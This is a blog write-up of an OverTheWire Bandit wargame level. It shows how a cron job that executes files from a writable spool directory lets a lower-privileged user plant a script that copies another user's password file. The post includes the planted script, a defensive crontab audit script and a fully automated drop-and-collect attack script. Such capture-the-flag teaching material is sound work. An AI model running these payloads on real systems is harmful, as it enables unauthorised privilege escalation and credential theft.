Exploiting Cron-Jobs

In this post, I would like to run through another one of OverTheWire's hacking challenges. To preserve the integrity of the challenges, all passwords in this post have been falsified.

Another day, another server. We have very limited access on our current user bandit23, and are tasked with gaining access to user bandit24.

One directory we can read, however, is /etc/cron.d. Unlike the per-user crontabs under /var/spool/cron, which only their owner (and root) can read, the files in /etc/cron.d are system crontabs: owned by root, world-readable by default, and carrying an extra field that names the user each job runs as.

There does indeed happen to be an active crontab file in this directory:

bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls
cronjob_bandit24

And reading that file, we can see that the crontab executes a bash script held in another directory:

bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

The second line runs this script every minute (five asterisks: every minute of every hour of every day); the first runs it once at boot. The crontab file itself is root-owned, but the sixth field tells cron to run the command as bandit24, so whatever the script does, it does with bandit24's privileges. Both stdout and stderr are sent to /dev/null, so a payload that fails will fail silently.
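The same crontab format can be audited from the defender's side. The following is an added example, not code from the original post: it parses /etc/cron.d-style entries (five schedule fields or an @keyword, then the user, then the command) and flags any job whose command file can be written by group or other, since such a job hands that user's privileges to whoever can edit the file. The sample entries and scripts built inside demo_audit are constructed for the demo; the paths are not from the level.

```shell
#!/bin/sh
# Added example, not code from the original post: audit /etc/cron.d-style entries.
# Each line is a comment, or five schedule fields + user + command, or an
# @keyword (e.g. @reboot) + user + command. A job whose command file is writable
# by group or other gives that user's privileges to anyone who can edit the file.
# The entries and files created in demo_audit are constructed for this demo.

# Print "<user> <command>" for one crontab line; print nothing for blank or comment lines.
cron_entry_user_cmd() {
    line=$1
    case "$line" in
        ''|'#'*) return 0 ;;
    esac
    set -f                  # disable globbing: the '*' schedule fields must not expand to file names
    set -- $line
    set +f
    case "$1" in
        @*) [ "$#" -ge 3 ] && printf '%s %s\n' "$2" "$3" ;;   # @reboot user command
        *)  [ "$#" -ge 7 ] && printf '%s %s\n' "$6" "$7" ;;   # min hour dom mon dow user command
    esac
    return 0
}

# Exit 0 if PATH has the write bit for group or other (read from ls -l, so it works on Linux and BSD).
writable_by_others() {
    perms=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        ?????w*|????????w?) return 0 ;;
    esac
    return 1
}

# Report one line per job in FILE: "<user> <command> <ok|WRITABLE|missing>".
audit_cron_file() {
    while IFS= read -r line || [ -n "$line" ]; do
        entry=$(cron_entry_user_cmd "$line")
        [ -n "$entry" ] || continue
        user=${entry%% *}
        cmd=${entry#* }
        if [ ! -e "$cmd" ]; then
            status=missing
        elif writable_by_others "$cmd"; then
            status=WRITABLE
        else
            status=ok
        fi
        printf '%s %s %s\n' "$user" "$cmd" "$status"
    done < "$1"
}

# Demo on constructed data: a service user's jobs, one pointing at a script that group
# and other can write (the weak setting), one at a locked-down script, one at a path
# that does not exist. The temp dir path is replaced by <dir> in the output.
demo_audit() {
    dir=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho hello\n' > "$dir/open.sh"
    printf '#!/bin/sh\necho hello\n' > "$dir/locked.sh"
    chmod 777 "$dir/open.sh"
    chmod 755 "$dir/locked.sh"
    {
        printf '# constructed sample in /etc/cron.d format\n'
        printf '@reboot svc %s/open.sh\n' "$dir"
        printf '* * * * * svc %s/open.sh &> /dev/null\n' "$dir"
        printf '0 3 * * * svc %s/locked.sh\n' "$dir"
        printf '*/5 * * * * svc /nonexistent/job.sh\n'
    } > "$dir/cronjob_svc"
    audit_cron_file "$dir/cronjob_svc" | sed "s|$dir|<dir>|g"
    rm -rf "$dir"
}

# Real use on the level: audit_cron_file /etc/cron.d/cronjob_bandit24
demo_audit
```

On the level itself the crontab passes this check (the script in /usr/bin is root-owned and not writable by others); the weakness is one step further down, in the directory that script chooses to execute from, which is why an audit should follow each job into the files and directories it touches.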

Let's take a look at this bash script:

bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done

What this script does is change into /var/spool/bandit24 (whoami returns bandit24 when cron runs it), execute every file in that directory, including hidden ones, giving each one 60 seconds before killing it with SIGKILL (timeout -s 9 60), and then delete it. This works nicely for us, provided we are allowed to write into that directory (check with ls -ld /var/spool/bandit24).

If this cronjob executes a bash script, and that bash script executes other bash scripts...well then I just need to write a bash script.

I'll start with making my own directory where I have ownership. bandit24 has to be able to create a file in it, hence the chmod; 777 is more than needed (bandit24 only needs write and execute on the directory), and it lets every other player on the shared box list the directory and read whatever lands there, so a less guessable name and chmod 733 would be the tidier choice:

bandit23@bandit:~$ mkdir /tmp/skyenet
bandit23@bandit:~$ chmod 777 /tmp/skyenet

We were shown earlier in the series that there is a directory /etc/bandit_pass/ where user passwords are stored, with the file permissions restricted to each relevant user. If bandit24 will be executing this bash script, then we can have them fetch their own password and share it with us.

And so that's what I will do!

Creating our script as follows will print the contents of bandit24's password file into a new .txt file within our own directory. The output path has to be absolute: the cron script cd's into /var/spool/bandit24 before running our file, so a relative path would point there instead, and with the job's output sent to /dev/null we would never see the error:

bandit23@bandit:~$ touch /tmp/skyenet/script.sh
bandit23@bandit:~$ cat /tmp/skyenet/script.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/skyenet/password.txt

Now we can make our script executable (the cron script runs it directly, so the execute bit matters) and deviously place it in /var/spool/bandit24, the directory we are allowed to write to:

bandit23@bandit:~$ chmod +x /tmp/skyenet/script.sh
bandit23@bandit:~$ cp /tmp/skyenet/script.sh /var/spool/bandit24/
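The whole drop-and-collect procedure, as an added example that is not part of the original post. It differs from the manual steps above in three ways: the payload writes by absolute path, the staging directory gets an unguessable name and mode 733 (bandit24 can create a file in it, other players cannot list it), and a polling loop replaces the repeated ls. SPOOL_DIR and PASS_FILE are the level's paths; the helper functions take explicit arguments so they can be exercised locally against constructed files, and the attack itself only runs when the spool directory is actually writable.

```shell
#!/bin/sh
# Added example, not code from the original post: the drop-and-collect procedure
# as one script. The payload uses absolute paths (the cron script cd's into
# /var/spool/bandit24 before running it, so a relative path would land there and
# the job's &> /dev/null would hide the error). SPOOL_DIR and PASS_FILE are the
# level's paths; the staging directory name is generated here.

SPOOL_DIR=/var/spool/bandit24
PASS_FILE=/etc/bandit_pass/bandit24

# Create the staging directory and print its path.
make_stage() {
    dir=$(mktemp -d /tmp/stage.XXXXXX) || return 1
    chmod 733 "$dir"          # rwx for us; -wx for everyone else, enough for bandit24 to create a file
    printf '%s\n' "$dir"
}

# write_payload PAYLOAD TARGET OUTFILE: a script that copies TARGET to OUTFILE, absolute paths only.
write_payload() {
    cat > "$1" <<EOF
#!/bin/sh
# runs as the cron user with cwd=$SPOOL_DIR, so every path here is absolute
cat '$2' > '$3'
chmod 644 '$3'
EOF
    chmod 755 "$1"            # the cron script executes the file directly, so it must be executable
}

# wait_for_file OUTFILE TIMEOUT: poll once a second; exit 0 if OUTFILE becomes non-empty in time.
wait_for_file() {
    i=0
    while [ "$i" -lt "$2" ]; do
        [ -s "$1" ] && return 0
        sleep 1
        i=$((i + 1))
    done
    [ -s "$1" ]
}

main() {
    stage=$(make_stage) || return 1
    write_payload "$stage/collect.sh" "$PASS_FILE" "$stage/password.txt"
    cp "$stage/collect.sh" "$SPOOL_DIR/" || return 1      # if this fails, check ls -ld $SPOOL_DIR
    # cron fires once a minute and the job allows the payload 60 s, so 90 s is a comfortable ceiling
    if wait_for_file "$stage/password.txt" 90; then
        cat "$stage/password.txt"
    else
        echo "no output after 90 s; if $SPOOL_DIR/collect.sh is gone the payload ran but failed, if it is still there cron has not fired" >&2
        return 1
    fi
}

# Only run the attack when we are actually on a box where the spool directory is writable.
if [ -w "$SPOOL_DIR" ]; then
    main
fi
```

The payload does its own chmod 644 on the output file so that it is readable by us even if bandit24's umask were stricter than the default; the 733 directory means someone who knows the exact path could still read the file, which is why the directory name is generated rather than chosen.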

As soon as the cronjob next runs, our script will be executed and a .txt will hopefully appear in our directory:

bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls
script.sh

Not yet...

bandit23@bandit:/tmp/skyenet$ ls
script.sh

Nearly there...

bandit23@bandit:/tmp/skyenet$ ls
script.sh  password.txt
bandit23@bandit:/tmp/skyenet$ cat password.txt
UoMYTmg6gzctqArfrBFHyQXwOmw1IohZ

Success! We have our password, and can proceed to SSH into user bandit24.


This has been a quick look into exploiting cronjobs and user permissions.

Thank you for reading!

DISCLAIMER: Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of SkyeNet.tech will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
